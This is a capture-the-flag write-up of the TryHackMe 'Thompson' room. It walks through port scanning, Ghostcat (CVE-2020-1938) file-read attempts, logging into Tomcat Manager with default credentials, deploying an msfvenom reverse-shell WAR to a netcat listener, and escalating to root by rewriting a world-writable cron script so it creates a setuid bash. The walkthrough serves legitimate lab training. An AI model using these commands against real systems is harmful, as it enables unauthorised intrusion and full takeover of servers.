# **Thompson**

![image.png](attachment:0b4fdd2b-47a1-4697-a9f5-5eb5093502e2:image.png)

# machine details.

target link: https://tryhackme.com/room/bsidesgtthompson

target ip: 10.81.166.172

# Enumeration.

To begin, I used my custom tool **GRecon** to perform both initial scanning and some automated enumeration.

### **Set Up GRecon**

```jsx
                                                                                    
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ git clone https://github.com/Moh-Gebril/grecon.git
cd grecon/
Cloning into 'grecon'...
remote: Enumerating objects: 44, done.
remote: Counting objects: 100% (44/44), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 44 (delta 12), reused 30 (delta 5), pack-reused 0 (from 0)
Receiving objects: 100% (44/44), 28.90 KiB | 604.00 KiB/s, done.
Resolving deltas: 100% (12/12), done.
```

### **Scan and Enumerate**

```jsx
┌──(kali㉿kali)-[~/THM/Thompson/grecon]
└─$ python3 grecon_cli.py -t Thompson.thm  --nmap --nse

     ██████╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗   ██╗                            
    ██╔════╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗  ██║                            
    ██║  ███╗██████╔╝█████╗  ██║     ██║   ██║██╔██╗ ██║                            
    ██║   ██║██╔══██╗██╔══╝  ██║     ██║   ██║██║╚██╗██║                            
    ╚██████╔╝██║  ██║███████╗╚██████╗╚██████╔╝██║ ╚████║                            
     ╚═════╝ ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝                            
                                                                                    
================================================================================
  GRecon v1.0.0 - Advanced Network Reconnaissance Tool
  Author: Mohamed Gebril
  GitHub: https://github.com/Moh-Gebril/grecon
  Running on: Linux 6.16.8+kali-amd64
================================================================================
  Scan initiated at: 2026-02-10 21:16:16
================================================================================

--------------------------------------------------------------------------------
  Target: Thompson.thm
  Time started: 2026-02-10 21:16:17
--------------------------------------------------------------------------------

2026-02-10 21:16:17,058 - grecon.core.scanner - INFO - Starting scan of 10.81.166.172 (Thompson.thm)
2026-02-10 21:16:17,058 - grecon.core.scanner - INFO - Port range: 1-65535
2026-02-10 21:16:17,058 - grecon.core.scanner - INFO - Using 200 threads
2026-02-10 21:16:17,278 - grecon.core.scanner - INFO - Port 22 is open
Port 22 is open
2026-02-10 21:16:24,750 - grecon.core.scanner - INFO - Port 8009 is open
Port 8009 is open

```

```jsx
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                          
Nmap done: 1 IP address (1 host up) scanned in 14.07 seconds

------------------------------------------------------------

```

```jsx
NSE SCRIPT SCAN
--------------------------------------------------------------------------------

Running NSE scripts... Done!          
2026-02-10 21:17:28,066 - grecon.core.nse_handler - INFO - Running NSE scripts for ssh on port 22: nmap -p22 --script=ssh-auth-methods,ssh-hostkey -sV -T4 -Pn -oA results/nse_ssh_22 Thompson.thm
2026-02-10 21:17:34,203 - grecon.core.nse_handler - INFO - Running NSE scripts for ajp13 on port 8009: nmap -p8009 --script=ajp-headers,ajp-request -sV -T4 -Pn -oA results/nse_ajp13_8009 Thompson.thm
NSE SCRIPT SCAN RESULTS
------------------------------------------------------------
Service: ssh on Port: 22
Scripts: ssh-auth-methods, ssh-hostkey
Command: nmap -p22 --script=ssh-auth-methods,ssh-hostkey -sV -T4 -Pn -oA results/nse_ssh_22 Thompson.thm                                                                
Status: Completed successfully
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
------------------------------------------------------------
Service: ajp13 on Port: 8009
Scripts: ajp-headers, ajp-request
Command: nmap -p8009 --script=ajp-headers,ajp-request -sV -T4 -Pn -oA results/nse_ajp13_8009 Thompson.thm                                                               
Status: Completed successfully
|_  Content-Type: text/html;charset=UTF-8
|                             <li><a href="http://tomcat.apache.org/connectors-doc/">mod_jk Documentation</a></li>                                                      
|_</html>
------------------------------------------------------------

================================================================================
  SCAN COMPLETED
  Elapsed time: 0:01:31.241979
  Completed at: 2026-02-10 21:17:47
================================================================================

```

---

### **Initial Foothold**

```jsx
                                                                                    
┌──(kali㉿kali)-[~/THM/Thompson/grecon/results]
└─$ cat nse_ssh_22.nmap
# Nmap 7.98 scan initiated Tue Feb 10 21:17:28 2026 as: /usr/lib/nmap/nmap --privileged -p22 --script=ssh-auth-methods,ssh-hostkey -sV -T4 -Pn -oA results/nse_ssh_22 Thompson.thm
Nmap scan report for Thompson.thm (10.81.166.172)
Host is up (0.16s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 10 21:17:34 2026 -- 1 IP address (1 host up) scanned in 6.09 seconds

```

## **Port 8009 (Apache JServ Protocol — AJP13)**

### **What is AJP13?**

- A **binary protocol** used by **Apache Tomcat** to connect with web servers (e.g., Apache HTTPD).
- Runs by default on **port 8009**.
- Never intended for public exposure — doing so often leads to critical vulnerabilities like:
1. *LFI (Local File Inclusion)*
2. *2. RCE (Remote Code Execution)*

*3. CVE-2020–1938 (Ghostcat)*

### **Further AJP13 Enumeration**

```jsx
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ nmap -p 8009 --script ajp-headers,ajp-request Thompson.thm
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-10 21:25 +0300
Nmap scan report for Thompson.thm (10.81.166.172)
Host is up (0.16s latency).

PORT     STATE SERVICE
8009/tcp open  ajp13
| ajp-headers: 
|_  Content-Type: text/html;charset=UTF-8
| ajp-request: 
| AJP/1.3 200 200
| Content-Type: text/html;charset=UTF-8

```

This confirmed that the Tomcat AJP13 service was accessible and serving **HTML content**, indicating an active and misconfigured instance

---

## **Exploiting Ghostcat (CVE-2020–1938)**

### **Clone the Exploit Tool**

```jsx
                                                                                    
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git
cd Ghostcat-CNVD-2020-10487

```

After cloning, we try to read the file. Unfortunately, the web.xml file didn’t reveal sensitive credentials.

```jsx
┌──(kali㉿kali)-[~/THM/Thompson/Ghostcat-CNVD-2020-10487]
└─$ python3 ajpShooter.py http://Thompson.thm:8080 8009 /WEB-INF/web.xml read
/home/kali/THM/Thompson/Ghostcat-CNVD-2020-10487/ajpShooter.py:363: SyntaxWarning: invalid escape sequence '\ '
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 200 200
[<] Accept-Ranges: bytes
[<] ETag: W/"1227-1472673232000"
[<] Last-Modified: Wed, 31 Aug 2016 19:53:52 GMT
[<] Content-Type: application/xml
[<] Content-Length: 1227

<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>

</web-app>

```

we try looking for passwords. This also failed, likely due to file access restrictions. While the vulnerability is present, it wasn’t directly exploitable for file disclosure in this instance.

```jsx
┌──(kali㉿kali)-[~/THM/Thompson/Ghostcat-CNVD-2020-10487]
└─$ python3 ajpShooter.py http://Thompson.thm:8080 8009 /etc/passwd read
/home/kali/THM/Thompson/Ghostcat-CNVD-2020-10487/ajpShooter.py:363: SyntaxWarning: invalid escape sequence '\ '
  /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __

       _    _         __ _                 _            
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __ 
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |   
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|   
         |__/|_|                                        
                                                00theway,just for test
    

[<] 500 500
[<] Content-Type: text/html;charset=utf-8
[<] Content-Language: en
[<] Content-Length: 1714

<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 500 - The requested resource (index) is not available</h1><div class="line"></div><p><b>type</b> Exception report</p><p><b>message</b> <u>The requested resource (index) is not available</u></p><p><b>description</b> <u>The server encountered an internal error that prevented it from fulfilling this request.</u></p><p><b>exception</b></p><pre>java.io.FileNotFoundException: The requested resource (index) is not available

```

---

### **Exploring the Web Interface**

- GRecon identified several interesting paths, including:
- `/examples`contained basic Tomcat sample apps.
- `/manager/html` (401 Protected)
- `/docs/`
- Navigating to `/manager/html` brought up the Tomcat **Manager login page**.

![image.png](attachment:72437121-d5c6-4023-9a3d-92d230e4f803:e19dddb5-c174-4dc5-94c1-9858099b72b3.png)

![image.png](attachment:2631cfad-d2b5-49e8-8303-1eed055e3a37:aace6e4f-c43e-47cf-95ee-513414d8435a.png)

And when we clicked on the **Sign in** button we got redirected to the following path:

![image.png](attachment:3aa831bf-10be-4d24-9bc4-89d3b149c9d1:8dcb6759-7f53-4cb5-930f-082cc203f3ff.png)

We found an example for credentials: username: **tomcat** and password: **s3cret**, We can try them in the found **login form.**

![image.png](attachment:5ade7a58-e585-4bb0-b209-150983fbf8cd:e0036132-dd8b-4567-b2ae-4c81cfd6d3a5.png)

### **WAR Deployment & Reverse Shell**

We found a **Deploy** section which allows us to deploy **war** files, so we will craft an exploit war file and then upload it to the server:

![image.png](attachment:accaa477-d486-418b-a689-c17c9b54f644:94d42274-671e-47ac-b7f5-3d858b38e13d.png)

### **Create Reverse Shell**

```jsx
┌──(kali㉿kali)-[~/THM/Thompson/grecon/results]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHost=192.168.136.140 LPORT=1234 -f war -o sheel.war

```

---

### **Deploy via Web Interface**

Using the **Deploy** section, upload `shell.war`. A new endpoint `/shell/` becomes available.

![image.png](attachment:b6e3f55f-e463-4e6e-b47e-2dad5049c1b1:5983cc19-0500-44e6-ab14-c931d931a436.png)

---

### **Start Listener**

```jsx
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ nc -lvp 4444
listening on [any] 4444 ...

```

Visiting `/shell` triggers the payload and spawns a reverse shell.

![image.png](attachment:17d7f942-ca5a-4a28-9a60-77d9f18256b4:c3226b92-6e32-429c-9969-98d724b8c325.png)

---

```jsx
                                                                                    
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ nc -nvlp 4444                                             
listening on [any] 4444 ...
connect to [192.168.136.140] from (UNKNOWN) [10.81.166.172] 36840
whoami
tomcat

```

---

### **Shell Stabilization**

```jsx
┌──(kali㉿kali)-[~/THM/Thompson]
└─$ nc -nvlp 4444                                             
listening on [any] 4444 ...
connect to [192.168.136.140] from (UNKNOWN) [10.81.166.172] 36840
whoami
tomcat
python -c 'import pty; pty.spawn("/bin/bash")'
tomcat@ubuntu:/$ 

```

---

### **Privilege Escalation**

Inside `/home/jack/`, two files stood out: `id.sh` and `test.txt`.

```jsx
python -c 'import pty; pty.spawn("/bin/bash")'
tomcat@ubuntu:/$ ls
ls
bin   etc         initrd.img.old  lost+found  opt   run   sys  var
boot  home        lib             media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old
tomcat@ubuntu:/$ cd home
cd home
tomcat@ubuntu:/home$ ls
ls
jack
tomcat@ubuntu:/home$ cd jack
cd jack
tomcat@ubuntu:/home/jack$ ls
ls
id.sh  test.txt  user.txt
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
tomcat@ubuntu:/home/jack$ 

```

- `test.txt` contained: `uid=0(root)` → clearly written by a script run as **root**.
- `id.sh` was world-writable: `rwxrwxrwx`.

This is a clear **privilege escalation vector** — a root-owned task executes a user-writable script.

```jsx
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ ls -la id.sh
ls -la id.sh
-rwxrwxrwx 1 jack jack 26 Aug 14  2019 id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ ls   
ls
id.sh  test.txt  user.txt
tomcat@ubuntu:/home/jack$ cat test.txt  
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ 

```

---

### **Exploit the Script**

Replace `id.sh` with a payload to drop a **setuid root shell**:

```jsx
echo '#!/bin/bash' > id.sh
echo 'cp /bin/bash /tmp/rootbash' >> id.sh
echo 'chmod +s /tmp/rootbash' >> id.sh
```

```jsx
tomcat@ubuntu:/home/jack$ ls
ls
id.sh  test.txt  user.txt
tomcat@ubuntu:/home/jack$ echo '#!/bin/bash' > id.sh
echo '#!/bin/bash' > id.sh
tomcat@ubuntu:/home/jack$ echo 'cp /bin/bash /tmp/rootbash' >> id.sh
echo 'cp /bin/bash /tmp/rootbash' >> id.sh
tomcat@ubuntu:/home/jack$ echo 'chmod +s /tmp/rootbash' >> id.sh
echo 'chmod +s /tmp/rootbash' >> id.sh

```

Wait a minute or two (cron job timing)

```jsx
tomcat@ubuntu:/home/jack$ ls -l /tmp/rootbash
ls -l /tmp/rootbash
-rwsr-sr-x 1 root root 1037528 Feb 10 11:49 /tmp/rootbash
tomcat@ubuntu:/home/jack$ /tmp/rootbash -p
/tmp/rootbash -p
rootbash-4.3# whoami
whoami
root
rootbash-4.3# 
```

```jsx
rootbash-4.3# cat /root/root.txt
cat /root/root.txt
d89d5391984c0450a95497153ae7ca3a
rootbash-4.3# 

```

![image.png](attachment:d2396427-b5da-4719-a3cb-cc1f96f1777d:65c922ec-32b5-493e-8223-e050a8e5eddf.png)

## **Flags Captured**

- **User Flag**: Found in `/home/jack/user.txt`
- **Root Flag**: Found in `/root/root.txt`

## Conclusion.

This room demonstrated:

- Enumeration with custom tooling (GRecon)
- Discovery and limited exploitation of Ghostcat (CVE-2020–1938)
- WAR-based reverse shell deployment via Tomcat Manager
- Privilege escalation via writable root-executed script
